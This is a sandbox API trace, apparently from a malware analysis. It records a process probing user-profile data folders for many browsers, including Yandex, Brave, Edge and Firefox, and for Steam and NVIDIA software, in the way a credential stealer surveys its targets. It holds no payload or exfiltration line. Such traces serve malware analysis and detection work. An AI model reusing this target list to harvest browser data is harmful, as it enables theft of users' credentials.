1 [0234.135] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data", lpFilePart=0x0) returned 0x30 [0234.136] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.239] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.239] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data") returned 0x40 [0234.239] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.239] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpFilePart=0x0) returned 0x3f [0234.239] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.241] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.241] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Comodo\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data") returned 0x32 [0234.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.241] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data", lpFilePart=0x0) returned 0x31 [0234.242] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.243] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.243] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\360Browser\\Browser\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data") returned 0x3e [0234.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.243] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data", lpFilePart=0x0) returned 0x3d [0234.244] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.245] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.245] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Maxthon3\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data") returned 0x34 [0234.246] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.246] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data", lpFilePart=0x0) returned 0x33 [0234.246] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.246] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.247] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.247] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\K-Melon\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data") returned 0x33 [0234.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.248] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data", lpFilePart=0x0) returned 0x32 [0234.248] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.250] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.250] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data") returned 0x3b [0234.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.251] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpFilePart=0x0) returned 0x3a [0234.251] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.252] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.252] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Nichrome\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data") returned 0x34 [0234.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.253] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data", lpFilePart=0x0) returned 0x33 [0234.253] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.254] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.255] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CocCoc\\Browser\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data") returned 0x3a [0234.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.255] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data", lpFilePart=0x0) returned 0x39 [0234.255] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.255] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.257] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.257] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Uran\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data") returned 0x30 [0234.257] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.257] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data", lpFilePart=0x0) returned 0x2f [0234.257] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.258] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.259] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.259] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chromodo\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data") returned 0x34 [0234.259] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.259] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data", lpFilePart=0x0) returned 0x33 [0234.259] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.261] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.261] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Mail.Ru\\Atom\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data") returned 0x38 [0234.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.310] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data", lpFilePart=0x0) returned 0x37 [0234.310] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.313] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.313] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data") returned 0x47 [0234.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.313] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpFilePart=0x0) returned 0x46 [0234.314] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.316] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.316] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Microsoft\\Edge\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data") returned 0x3a [0234.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.316] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data", lpFilePart=0x0) returned 0x39 [0234.316] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.318] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.318] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience") returned 0x4e [0234.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.318] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", lpFilePart=0x0) returned 0x4d [0234.319] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.320] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.320] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Steam", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam") returned 0x27 [0234.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.320] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam", lpFilePart=0x0) returned 0x26 [0234.320] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.322] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.322] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CryptoTab Browser\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data") returned 0x3d [0234.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.322] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data", lpFilePart=0x0) returned 0x3c [0234.322] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.444] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.444] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Mozilla\\Firefox", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Mozilla\\Firefox") returned 0x33 [0234.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f014) returned 1 [0234.444] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Mozilla\\Firefox", nBufferLength=0x105, lpBuffer=0x38eaf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Mozilla\\Firefox", lpFilePart=0x0) returned 0x32 [0234.444] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x38edc4 | out: lpFindFileData=0x38edc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed84) returned 1 [0234.446] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.446] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Waterfox", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Waterfox") returned 0x2c [0234.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f014) returned 1 [0234.446] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Waterfox", nBufferLength=0x105, lpBuffer=0x38eaf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Waterfox", lpFilePart=0x0) returned 0x2b [0234.446] FindFirstFileW (in: 